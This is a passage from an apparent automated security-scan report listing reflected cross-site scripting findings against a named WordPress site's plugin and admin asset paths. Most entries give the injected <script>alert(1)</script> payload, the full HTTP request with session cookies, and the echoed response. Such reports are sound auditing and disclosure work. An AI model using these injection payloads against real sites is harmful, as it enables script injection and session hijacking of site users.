Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-admina5c5f<script>alert(1)</script>7b5a1b70079/css/login.css?ver=20100601 </strong>
...[SNIP]...

2.56. http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-admin/css/login.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7f7a5<script>alert(1)</script>9b0dedc91ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/css7f7a5<script>alert(1)</script>9b0dedc91ce/login.css?ver=20100601 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/wp-login.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:20 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-admin/css7f7a5<script>alert(1)</script>9b0dedc91ce/login.css?ver=20100601 </strong>
...[SNIP]...

2.57. http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-admin/css/login.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b7ff7<script>alert(1)</script>8a49ffa7eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/css/login.cssb7ff7<script>alert(1)</script>8a49ffa7eb?ver=20100601 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/wp-login.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:36 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-admin/css/login.cssb7ff7<script>alert(1)</script>8a49ffa7eb?ver=20100601 </strong>
...[SNIP]...

2.58. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a584d<script>alert(1)</script>8a64675d152 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contenta584d<script>alert(1)</script>8a64675d152/plugins/wp-polls/polls-css.css?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:37 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-contenta584d<script>alert(1)</script>8a64675d152/plugins/wp-polls/polls-css.css?ver=2.50 </strong>
...[SNIP]...

2.59. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc0a9<script>alert(1)</script>7d968794e31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsfc0a9<script>alert(1)</script>7d968794e31/wp-polls/polls-css.css?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:49 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/pluginsfc0a9<script>alert(1)</script>7d968794e31/wp-polls/polls-css.css?ver=2.50 </strong>
...[SNIP]...

2.60. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d2e41<script>alert(1)</script>dc6b1b1a6cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-pollsd2e41<script>alert(1)</script>dc6b1b1a6cd/polls-css.css?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:09 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:07 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins/wp-pollsd2e41<script>alert(1)</script>dc6b1b1a6cd/polls-css.css?ver=2.50 </strong>
...[SNIP]...

2.61. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a5199<script>alert(1)</script>a2929eae7fc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-polls/polls-css.cssa5199<script>alert(1)</script>a2929eae7fc?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:28 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.cssa5199<script>alert(1)</script>a2929eae7fc?ver=2.50 </strong>
...[SNIP]...

2.62. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9ee77<script>alert(1)</script>7cc8e94ec7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content9ee77<script>alert(1)</script>7cc8e94ec7d/plugins/wp-polls/polls-js.js?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:44 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content9ee77<script>alert(1)</script>7cc8e94ec7d/plugins/wp-polls/polls-js.js?ver=2.50 </strong>
...[SNIP]...

2.63. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1dbff<script>alert(1)</script>b6d08d9390f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins1dbff<script>alert(1)</script>b6d08d9390f/wp-polls/polls-js.js?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:05 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins1dbff<script>alert(1)</script>b6d08d9390f/wp-polls/polls-js.js?ver=2.50 </strong>
...[SNIP]...

2.64. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 50078<script>alert(1)</script>a48f2ebca3f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-polls50078<script>alert(1)</script>a48f2ebca3f/polls-js.js?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:35 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins/wp-polls50078<script>alert(1)</script>a48f2ebca3f/polls-js.js?ver=2.50 </strong>
...[SNIP]...

2.65. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 62b86<script>alert(1)</script>6e2a650f32b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-polls/polls-js.js62b86<script>alert(1)</script>6e2a650f32b?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:12 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js62b86<script>alert(1)</script>6e2a650f32b?ver=2.50 </strong>
...[SNIP]...

2.66. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-postratings/postratings-js.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a20a8<script>alert(1)</script>bfb31b38a15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contenta20a8<script>alert(1)</script>bfb31b38a15/plugins/wp-postratings/postratings-js.js?ver=1.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:55 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-contenta20a8<script>alert(1)</script>bfb31b38a15/plugins/wp-postratings/postratings-js.js?ver=1.50 </strong>
...[SNIP]...

2.67. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-postratings/postratings-js.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f789e<script>alert(1)</script>f2acdbcfeda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsf789e<script>alert(1)</script>f2acdbcfeda/wp-postratings/postratings-js.js?ver=1.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:13 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/pluginsf789e<script>alert(1)</script>f2acdbcfeda/wp-postratings/postratings-js.js?ver=1.50 </strong>
...[SNIP]...

2.68. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-postratings/postratings-js.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9dfa9<script>alert(1)</script>8fc76e0ba66 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-postratings9dfa9<script>alert(1)</script>8fc76e0ba66/postratings-js.js?ver=1.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:46 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
